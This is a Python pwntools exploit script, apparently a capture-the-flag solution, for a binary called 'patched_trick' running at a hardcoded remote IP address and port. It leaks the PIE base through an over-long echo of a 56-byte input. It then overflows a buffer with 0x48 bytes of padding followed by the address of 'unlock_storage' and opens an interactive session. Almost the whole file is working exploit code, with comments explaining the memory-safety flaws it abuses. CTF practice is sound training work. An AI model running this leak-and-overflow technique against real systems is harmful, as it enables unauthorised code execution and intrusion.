#!/usr/bin/python3
from pwn import context, args, gdb, ELF, process, u64, log, remote, p64
# Word size / endianness for the packing helpers (u64, p64) used below.
context.arch = 'amd64'
# The patched challenge binary; registering it as context.binary lets pwntools
# derive its defaults from the ELF headers.
elf = ELF("./patched_trick")
context.binary = elf
# Bundled libc. Loaded here but not referenced anywhere else in this script.
libc = ELF("./glibc/libc.so.6")
# gdb script used by start() when GDB=1 is given: just resume the target.
gs = "\ncontinue\n"
def start():
    """Launch the target binary locally.

    With GDB=1 on the command line the binary is started under gdb with the
    ``gs`` script; otherwise it runs as a plain process. Returns the pwntools
    tube for the new process.
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    return process(elf.path)
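# Tube the rest of the script talks to. The remote endpoint is the default so the
# script behaves as before; pass LOCAL=1 on the command line to go through start()
# instead (LOCAL is an arbitrary key resolved through pwntools' args, like GDB above;
# add GDB=1 as well to attach gdb). This replaces the commented-out toggle.
p = start() if args.LOCAL else remote("83.136.253.184", 59748)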
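def main():
    """Run the two-stage interaction over the module-level tube ``p``.

    Stage 1 recovers the PIE base from bytes the service echoes back after a
    56-byte input. Stage 2 submits a 0x58-byte value whose tail is the address of
    ``unlock_storage`` and then hands the session to the user.

    Uses ``p`` and ``elf`` from module scope; returns nothing. Raises ValueError
    when the echoed data is too short to hold a pointer, instead of silently
    continuing with a garbage base address.

    NOTE(review): both stages depend on the service accepting a caller-chosen
    length without bounding it against the buffer it fills, and on echoing more
    than was written — that is what a length check on the service side would
    remove. The binary itself is not on this page, so treat that as an inference.
    """
    # Menu option 2 reads input and echoes it. With 56 bytes of filler the echo
    # continues past the filler; the bytes after it are what the leak is read from.
    filler = b'A' * 56
    p.sendlineafter(b'do? ', b'2')
    p.sendafter(b'!!?', filler)
    p.recvuntil(filler)
    # Original author's note: something odd happens here, suspected to be fflush
    # behaviour. recv(24) may return fewer bytes than asked for, so check before
    # decoding rather than turning a short read into a wrong base address.
    leak = p.recv(24)
    if len(leak) < 6:
        raise ValueError(f"expected at least 6 leaked bytes, got {len(leak)}: {leak!r}")
    # A canonical user-space x86-64 address fits in 6 bytes; pad to 8 for u64.
    # 0x9b0 is the leaked pointer's offset from the PIE base (from the original script).
    elf.address = u64(leak[:6].ljust(8, b'\x00')) - 0x9b0
    log.success(f"PIE base: {hex(elf.address)}")
    log.info(f"Win address: {hex(elf.sym.unlock_storage)}")
    # Menu 4, then menu 3 with a 'y' confirmation and a self-chosen length of 0x58.
    p.sendlineafter(b'do? ', b'4')
    p.sendlineafter(b'do? ', b'3')
    p.sendlineafter(b'n):', b'y')
    p.sendlineafter(b'be? ', str(0x58).encode())
    # 0x48 bytes of padding followed by the 8-byte target address (0x50 bytes of the
    # 0x58 announced above).
    payload = b'A' * 0x48 + p64(elf.sym.unlock_storage)
    p.sendafter(b'me? ', payload)
    p.interactive()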
# Only drive the tube when run as a script, not when imported.
if __name__ == "__main__":
    main()